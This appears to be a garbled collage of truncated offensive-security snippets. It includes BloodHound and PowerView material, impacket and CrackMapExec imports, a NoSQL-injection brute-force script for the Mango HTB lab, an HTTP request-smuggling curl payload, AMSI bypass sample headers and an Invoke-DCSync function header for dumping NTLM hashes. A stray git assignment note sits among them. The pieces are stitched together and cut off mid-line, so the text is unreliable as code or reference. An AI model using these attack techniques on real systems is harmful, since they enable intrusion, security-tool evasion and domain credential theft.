Collection of BloodHound Cypher Query Examples
- I- Raw
- II- Built-In
- III- Custom
- IV- DB Manipulation
- V- REST API (PowerShell)
import sys
from impacket_rdpcheck import check_rdp as imp_checkrdp
import impacket_rdpcheck_original as imp_checkrdp_orig
from argparse import ArgumentParser
from pypsrp.client import Client
from impacket import tds
from sys import stdout
from os import path
from cme import crackmapexec
import bz2
import csv
import io
import os
import tarfile
import requests
import argparse
from termcolor import colored
The repository for the assignment is public, and GitHub does not allow the creation of private forks of public repositories.
The correct way of creating a private fork by duplicating the repository is documented here.
For this assignment the commands are:
git clone --bare git@github.com:usi-systems/easytrace.git
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : 'find' specific data entries in a data set
# ippsec's Mango HTB mongo DB brute force script
import requests

def inject(data):
    r = requests.post('http://staging-order.mango.htb/', data=data, allow_redirects=False)
    if r.status_code != 200:
        return True

# a prefix can be added to secret to set where the brute-force begins
secret = ""
payload = ""
# CL:TE -- Standard CL and TE
curl -i -s -k -X $'POST' \
-H $'Host: subdomain1.joe.pr.qing-wen.com/' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: keep-alive' -H $'Upgrade-Insecure-Requests: 1' -H $'Cache-Control: max-age=0' -H $'Content-Length: 382' -H $'Transfer-Encoding: chunked' \
--data-binary $'172\x0d\x0aPOST /def HTTP/1.1\x0d\x0aHost: subdomain1.joe.pr.qing-wen.com/\x0d\x0aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0\x0d\x0aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\x0d\x0aAccept-Language: en-US,en;q=0.5\x0d\x0aAccept-Encoding: gzip, deflate\x0d\x0aConnection: keep-alive\x0d\x0aUpgrade-Insecure-Requests: 1\x0d\x0aCache-Control: max-age=0\x0d\x0a0\x0d\x0a\x0d\x0a' \
$'https://subdomain1.j
'##################################################################################
' Code samples for AMSI bypass techniques
' relating to the blogpost on AMSI bypasses on https://outflank.nl/blog/
'##################################################################################
' ##################################################################################
' AMSI Bypass approach that abuses trusted locations (sample for Word)
' ##################################################################################
function Invoke-DCSync
{
    <#
    .SYNOPSIS
    Uses dcsync from mimikatz to collect NTLM hashes from the domain.
    Author: @monoxgas
    Improved by: @harmj0y
# From https://wald0.com/?p=14
# Requires PowerView
$Graph = @()
$Infinity = [int]::MaxValue
$Nodes = Get-NetUser | ForEach-Object { $_.samaccountname }
$Nodes += Get-NetComputer
ForEach($Node in $Nodes){
    $Vertex = New-Object PSObject